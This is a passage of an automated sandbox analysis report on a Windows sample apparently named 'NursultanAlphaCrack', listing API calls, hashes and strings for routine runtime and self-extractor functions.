                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: f5616322f12a4c294a35480f8e0933c9f15896fb7ea483d05254814724eaf065
                                                                                        • Instruction ID: c59db92765a5f7d973277ac81efc7974e25fc62d6fcab5c76a0c59ba6a608dbc
                                                                                        • Opcode Fuzzy Hash: f5616322f12a4c294a35480f8e0933c9f15896fb7ea483d05254814724eaf065
                                                                                        • Instruction Fuzzy Hash: 7331E875208345ABC704DFA8D8849ABB7F8FF98714F044A1EF999C3610E734D549CBA6
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,001E2AF1,001E02FC,001DFA34), ref: 001E2B08
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001E2B16
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001E2B2F
                                                                                        • SetLastError.KERNEL32(00000000,001E2AF1,001E02FC,001DFA34), ref: 001E2B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: 0846097985d2ffb77a91f22826a2f216d30a9fc24f53794b0cdb562bf951505c
                                                                                        • Instruction ID: e87dcb0ee584459275cbc13c61d4c21df6764a7cc520caa84d2c5e46be2fe675
                                                                                        • Opcode Fuzzy Hash: 0846097985d2ffb77a91f22826a2f216d30a9fc24f53794b0cdb562bf951505c
                                                                                        • Instruction Fuzzy Hash: 4A012833108F516DA6282BB77C6993E7B8EEB217B4760033AF420564F0EFA25C40D244
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00201030,001E4674,00201030,?,?,001E3F73,00000050,?,00201030,00000200), ref: 001E97E9
                                                                                        • _free.LIBCMT ref: 001E981C
                                                                                        • _free.LIBCMT ref: 001E9844
                                                                                        • SetLastError.KERNEL32(00000000,?,00201030,00000200), ref: 001E9851
                                                                                        • SetLastError.KERNEL32(00000000,?,00201030,00000200), ref: 001E985D
                                                                                        • _abort.LIBCMT ref: 001E9863
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 95acf519411db3c84098ca7f749bd42220a5673708d97784008d7ba48baad5af
                                                                                        • Instruction ID: 6ad44bcb8d692db077e04a0f5d4fe50edaac0275a51bab1821823bfbfda95aa8
                                                                                        • Opcode Fuzzy Hash: 95acf519411db3c84098ca7f749bd42220a5673708d97784008d7ba48baad5af
                                                                                        • Instruction Fuzzy Hash: 68F02835100E85A6C71233777C0AE2F2A659FE2B70F250124F528925F2FF2088028165
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001DDC47
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DDC61
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DDC72
                                                                                        • TranslateMessage.USER32(?), ref: 001DDC7C
                                                                                        • DispatchMessageW.USER32(?), ref: 001DDC86
                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001DDC91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 2148572870-0
                                                                                        • Opcode ID: 54d249452710d66c25785fb19912e80114fc99ac288230df20619c6f46196319
                                                                                        • Instruction ID: 92c90d890fd5d09edc862899e52f0a296e9068fdd3aa186417987fcabe479b0a
                                                                                        • Opcode Fuzzy Hash: 54d249452710d66c25785fb19912e80114fc99ac288230df20619c6f46196319
                                                                                        • Instruction Fuzzy Hash: CEF03C72A01219BBCB20ABE5EC4DDDB7F7DEF41791F004012B50AD2050D6799686CBB0
                                                                                        APIs
                                                                                          • Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0
                                                                                          • Part of subcall function 001CB92D: _wcsrchr.LIBVCRUNTIME ref: 001CB944
                                                                                        • _wcslen.LIBCMT ref: 001CC197
                                                                                        • _wcslen.LIBCMT ref: 001CC1DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                        • String ID: .exe$.rar$.sfx
                                                                                        • API String ID: 3513545583-31770016
                                                                                        • Opcode ID: a2ffee8b0293d734ee2f53da7549d5366c29a106c7796926310a38c7d1325c91
                                                                                        • Instruction ID: 6fc2a0c26af279155cd3f0b5bd2b235a7b9087a49bd2f642014e69c3046004d0
                                                                                        • Opcode Fuzzy Hash: a2ffee8b0293d734ee2f53da7549d5366c29a106c7796926310a38c7d1325c91
                                                                                        • Instruction Fuzzy Hash: FE412526500362E5C736AF748852F7EB3A8EF74754F18094EF999AB181EB60CD91C3D1
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 001DCE9D
                                                                                          • Part of subcall function 001CB690: _wcslen.LIBCMT ref: 001CB696
                                                                                        • _swprintf.LIBCMT ref: 001DCED1
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                        • SetDlgItemTextW.USER32(?,00000066,0020946A), ref: 001DCEF1
                                                                                        • EndDialog.USER32(?,00000001), ref: 001DCFFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: %s%s%u
                                                                                        • API String ID: 110358324-1360425832
                                                                                        • Opcode ID: a59f364404bfe690ef5cfe701b805afc84d408a1cf9ca65f566a8c61404efa97
                                                                                        • Instruction ID: c9ca8a701b57eaa7b3c6e7dad3c593572612a0c51583dd402318302b9a3001b8
                                                                                        • Opcode Fuzzy Hash: a59f364404bfe690ef5cfe701b805afc84d408a1cf9ca65f566a8c61404efa97
                                                                                        • Instruction Fuzzy Hash: A14182B1900259AADF25DB94DC45FEA77BCEB15300F4084A7F909E7141EB709A84CFA1
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 001CBB27
                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,001CA275,?,?,00000800,?,001CA23A,?,001C755C), ref: 001CBBC5
                                                                                        • _wcslen.LIBCMT ref: 001CBC3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                        • String ID: UNC$\\?\
                                                                                        • API String ID: 3341907918-253988292
                                                                                        • Opcode ID: cf5c17bb0caa171b2c8f90225cd735040701b31ffa630c66e8dfd92ed091039a
                                                                                        • Instruction ID: f93f778b702192cbf12b040de726781f8c113bb0ef148cdb921be032a5f3cafd
                                                                                        • Opcode Fuzzy Hash: cf5c17bb0caa171b2c8f90225cd735040701b31ffa630c66e8dfd92ed091039a
                                                                                        • Instruction Fuzzy Hash: E841C231404259A6CF21AF60CC83FEA77A9AF64395F00442AF924E3151DBB5DE908A64
                                                                                        APIs
                                                                                          • Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
                                                                                          • Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        • EndDialog.USER32(?,00000001), ref: 001DB2BE
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001DB2D6
                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 001DB304
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: GETPASSWORD1$xz!
                                                                                        • API String ID: 445417207-1603523493
                                                                                        • Opcode ID: 3e097fe47781dfb97143b74b26fca7c9c3022aec34bf4f7a388a55f43ada17bf
                                                                                        • Instruction ID: bd44e552e00d84e9ed29e35bbb95832f2064ee87facaa076bbe799733ce70382
                                                                                        • Opcode Fuzzy Hash: 3e097fe47781dfb97143b74b26fca7c9c3022aec34bf4f7a388a55f43ada17bf
                                                                                        • Instruction Fuzzy Hash: B7110833944118F6DB219EA4AC89FFF376DFF69710F010026FA46B2280C7A4EA419771
                                                                                        APIs
                                                                                        • LoadBitmapW.USER32(00000065), ref: 001DB6ED
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 001DB712
                                                                                        • DeleteObject.GDI32(00000000), ref: 001DB744
                                                                                        • DeleteObject.GDI32(00000000), ref: 001DB767
                                                                                          • Part of subcall function 001DA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001DB73D,00000066), ref: 001DA6D5
                                                                                          • Part of subcall function 001DA6C2: SizeofResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA6EC
                                                                                          • Part of subcall function 001DA6C2: LoadResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA703
                                                                                          • Part of subcall function 001DA6C2: LockResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA712
                                                                                          • Part of subcall function 001DA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001DB73D,00000066), ref: 001DA72D
                                                                                          • Part of subcall function 001DA6C2: GlobalLock.KERNEL32(00000000), ref: 001DA73E
                                                                                          • Part of subcall function 001DA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001DA762
                                                                                          • Part of subcall function 001DA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001DA7A7
                                                                                          • Part of subcall function 001DA6C2: GlobalUnlock.KERNEL32(00000000), ref: 001DA7C6
                                                                                          • Part of subcall function 001DA6C2: GlobalFree.KERNEL32(00000000), ref: 001DA7CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                        • String ID: ]
                                                                                        • API String ID: 1797374341-3352871620
                                                                                        • Opcode ID: db807cdef55f2a07eded2f9948a586fdfab70daf0c8d2215dcb261ebe9f0750c
                                                                                        • Instruction ID: 1d1f32f47ee457e2be4c3192f1584251a622491803e4360c7b1557c5c580e737
                                                                                        • Opcode Fuzzy Hash: db807cdef55f2a07eded2f9948a586fdfab70daf0c8d2215dcb261ebe9f0750c
                                                                                        • Instruction Fuzzy Hash: 4701C436940211A7C721B7746C49A7F7A7AAFC0752F0A0016F901A7391DF25CE064272
                                                                                        APIs
                                                                                          • Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
                                                                                          • Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        • EndDialog.USER32(?,00000001), ref: 001DD64B
                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001DD661
                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 001DD675
                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 001DD684
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: RENAMEDLG
                                                                                        • API String ID: 445417207-3299779563
                                                                                        • Opcode ID: f45233917aa9e86084e76bb1337127f0acf9b2c16f967eb02d9c690deb79bf5a
                                                                                        • Instruction ID: 9a412aff7b07fb660ba13167cb09780f0acd6290997c121e1b62edbc8548b3fe
                                                                                        • Opcode Fuzzy Hash: f45233917aa9e86084e76bb1337127f0acf9b2c16f967eb02d9c690deb79bf5a
                                                                                        • Instruction Fuzzy Hash: CA01D833284214BAD2318FA4BE0DFA7775EEB6AB41F114412F305A21D0CBA6EA0597F5
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001E7E24,00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002), ref: 001E7E93
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001E7EA6
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,001E7E24,00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002), ref: 001E7EC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 42eea642a899120946e500c1b7b632f7dbea3e96ad03588b9c4caef123a0f3ee
                                                                                        • Instruction ID: 79e0c28974205761cfa652cb4d33d13276e33e198b76382e8073763a528a60eb
                                                                                        • Opcode Fuzzy Hash: 42eea642a899120946e500c1b7b632f7dbea3e96ad03588b9c4caef123a0f3ee
                                                                                        • Instruction Fuzzy Hash: BEF0683190460CBBDB15AFA1DC09BBEBFB4EF44711F0041A9F815A22A0DB309E80CB90
                                                                                        APIs
                                                                                          • Part of subcall function 001D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
                                                                                          • Part of subcall function 001D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858
                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001CF2E4
                                                                                        • GetProcAddress.KERNEL32(002081C8,CryptUnprotectMemory), ref: 001CF2F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                        • API String ID: 2141747552-1753850145
                                                                                        • Opcode ID: 990c22c81df2d3a69aeb1f257c5c018d8918ae99f1b235b2ae50f12f05bd99c3
                                                                                        • Instruction ID: 318e2d65468ce2505a0bca7c0e98a96d09452abd201e5a6c8e305316a1b41985
                                                                                        • Opcode Fuzzy Hash: 990c22c81df2d3a69aeb1f257c5c018d8918ae99f1b235b2ae50f12f05bd99c3
                                                                                        • Instruction Fuzzy Hash: A6E08C70911756AECB219F3A984DB22BED46F28700F14886EF1EBE3B40DBB4D581CB50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 2252061734-0
                                                                                        • Opcode ID: 85191358527fd28214a395b9f67b7bd6fd048d705192480ea4345f7f6b699fb3
                                                                                        • Instruction ID: c85b6d10586a676cec672ae8150771dfa80e967e6c221847d433892fef5838a8
                                                                                        • Opcode Fuzzy Hash: 85191358527fd28214a395b9f67b7bd6fd048d705192480ea4345f7f6b699fb3
                                                                                        • Instruction Fuzzy Hash: F2510371500A86AFDB298F96DC65BBE73A9FF24300F34412DE906472A1D771ED80D790
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 001EBF39
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EBF5C
                                                                                          • Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001EBF82
                                                                                        • _free.LIBCMT ref: 001EBF95
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001EBFA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: ee60c2b60176785acf6ecb038039ad9c39411ee703c21685904edc6eeed39789
                                                                                        • Instruction ID: e6eca985d3bddf38940c6c0d0b3b1d1ca0a8f6b70e6269e3b66b38ad2d8a9be2
                                                                                        • Opcode Fuzzy Hash: ee60c2b60176785acf6ecb038039ad9c39411ee703c21685904edc6eeed39789
                                                                                        • Instruction Fuzzy Hash: D8018472609A957F272116B75CCDC7F7A6DEEC2BA13290129F908D2141EF60CD02D5B0
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00201030,00000200,001E91AD,001E617E,?,?,?,?,001CD984,?,?,?,00000004,001CD710,?), ref: 001E986E
                                                                                        • _free.LIBCMT ref: 001E98A3
                                                                                        • _free.LIBCMT ref: 001E98CA
                                                                                        • SetLastError.KERNEL32(00000000,001F3A34,00000050,00201030), ref: 001E98D7
                                                                                        • SetLastError.KERNEL32(00000000,001F3A34,00000050,00201030), ref: 001E98E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
